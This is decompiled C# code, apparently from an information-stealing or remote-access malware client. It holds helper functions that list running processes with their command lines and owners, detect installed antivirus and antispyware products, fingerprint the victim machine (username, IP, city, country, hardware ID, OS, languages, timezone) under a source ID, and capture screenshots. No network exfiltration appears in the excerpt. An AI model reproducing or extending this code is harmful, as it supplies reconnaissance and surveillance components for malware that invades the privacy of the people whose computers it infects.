// Token: 0x06000015 RID: 21 RVA: 0x0000282C File Offset: 0x00000A2C
public static List <RemoteProcess> ListOfProcesses()
{
List <RemoteProcess> list = new List <RemoteProcess>();
try
{
foreach (Process process in Process.GetProcesses())
{
try
{
RemoteProcess remoteProcess = new RemoteProcess
{
ProcessID = process.Id,
ProcessCommandLine = ClientInfoHelper.GetCommandLine(process),
ProcessName = new FileInfo(process.MainModule.FileName).Name
};
string str;
string str2;
ClientInfoHelper.ReciveOwner(process.Id, out str, out str2);
remoteProcess.ProcessUsername = str2 + "\\" + str;
list.Add(remoteProcess);
}
catch
{
}
}
}
catch
{
}
return(list);
}
// Token: 0x06000020 RID: 32 RVA: 0x00002D54 File Offset: 0x00000F54
public static List <string> ParseDefenders()
{
List <string> list = new List <string>();
try
{
list.AddRange(ClientInfoHelper.ParseAntiViruses().IsNull(new List <string>()));
foreach (string item in ClientInfoHelper.ParseSpyWares().IsNull(new List <string>()))
{
if (!list.Contains(item))
{
list.Add(item);
}
}
}
catch
{
}
return(list);
}
// Token: 0x06000014 RID: 20 RVA: 0x000026D8 File Offset: 0x000008D8
public static RemoteClientInformation Create(string SourceID)
{
RemoteClientInformation result;
try
{
GeoLocationHelper.Initialize();
Size screenSize = ClientInfoHelper.GetScreenSize();
string text = TimeZone.CurrentTimeZone.GetUtcOffset(DateTime.Now).ToString();
if (!text.StartsWith("-"))
{
text = "+" + text;
}
result = new RemoteClientInformation
{
ID = 0,
LogTime = DateTime.Now,
SourceID = SourceID,
UserName = Environment.UserName,
ClientIP = GeoLocationHelper.GeoInfo.Query,
Country = GeoLocationHelper.GeoInfo.CountryCode,
OperationSystem = ClientInfoHelper.ParseOS(),
HardwareID = ClientInfoHelper.ParseHWID(),
Hardwares = ClientInfoHelper.ParseHardwares(),
Antiviruses = ClientInfoHelper.ParseDefenders(),
Languages = ClientInfoHelper.AvailableLanguages(),
CurrentLanguage = InputLanguage.CurrentInputLanguage.Culture.EnglishName,
MonitorSize = string.Format("{0}x{1}", screenSize.Width, screenSize.Height),
TimeZone = "UTC" + text,
City = GeoLocationHelper.GeoInfo.City
};
}
catch
{
result = null;
}
return(result);
}
// Token: 0x0600001D RID: 29 RVA: 0x00002C4C File Offset: 0x00000E4C
private static Bitmap GetScreenshot()
{
Bitmap result;
try
{
Size screenSize = ClientInfoHelper.GetScreenSize();
Bitmap bitmap = new Bitmap(screenSize.Width, screenSize.Height);
using (Graphics graphics = Graphics.FromImage(bitmap))
{
graphics.InterpolationMode = InterpolationMode.Bicubic;
graphics.PixelOffsetMode = PixelOffsetMode.HighSpeed;
graphics.SmoothingMode = SmoothingMode.HighSpeed;
graphics.CopyFromScreen(new Point(0, 0), new Point(0, 0), screenSize);
}
result = bitmap;
}
catch
{
result = null;
}
return(result);
}
// Token: 0x0600001C RID: 28 RVA: 0x00002062 File Offset: 0x00000262
public static byte[] CaptureScreen()
{
return(ClientInfoHelper.ImageToByte(ClientInfoHelper.GetScreenshot()));
}
